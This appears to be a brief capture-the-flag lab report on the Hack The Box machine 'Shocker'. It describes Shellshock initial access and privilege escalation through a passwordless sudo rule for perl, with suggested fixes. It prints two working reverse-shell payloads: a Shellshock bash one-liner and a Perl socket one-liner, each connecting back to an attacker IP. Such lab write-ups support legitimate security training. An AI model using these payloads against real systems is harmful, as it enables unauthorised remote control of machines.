Report - HTB Shocker Report

1. port scan result

IP Address	Port Open
10.10.10.56	80

 

 

2. initial access - ShellShock

Vulnerability Explanation : CGI to use Shell is subject to ShellShcok vulnerability. Attacker can use this vulnerability to cause arbitrary remote code excution and take complete control over the system  

Vulnerability Fix : update to latest bash shell and move CGI directory(cgi-bin) to place where user can't access 

Severity : critical

Steps to reproduce the attack :

() { :;};echo; /bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1

screenshot:

post-exploitation : 

screensht:

 

3. Privilege Escalation - sudo setting vulnerability

 

Vulnerability Explanation : After establishing a foothold on tartget, i noticed there is sudo setting vulnerability. this setting can be verifyed by the command below

sudo -l

after inputing this command, i noticed to can use perl programm as administrator in no password. this vulnerability can cause privilige escalation. i can Privilige Escalation to use reverse shell.

Vulnerability Fix : if possible, do not use this setting. fix /etc/sudoers file.

 

Severity : critical, 

Steps to reproduce the attack : 

perl -e 'use Socket;$i="10.10.14.4";$p=446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

screenshot:

post-exploitation : 

screenshot: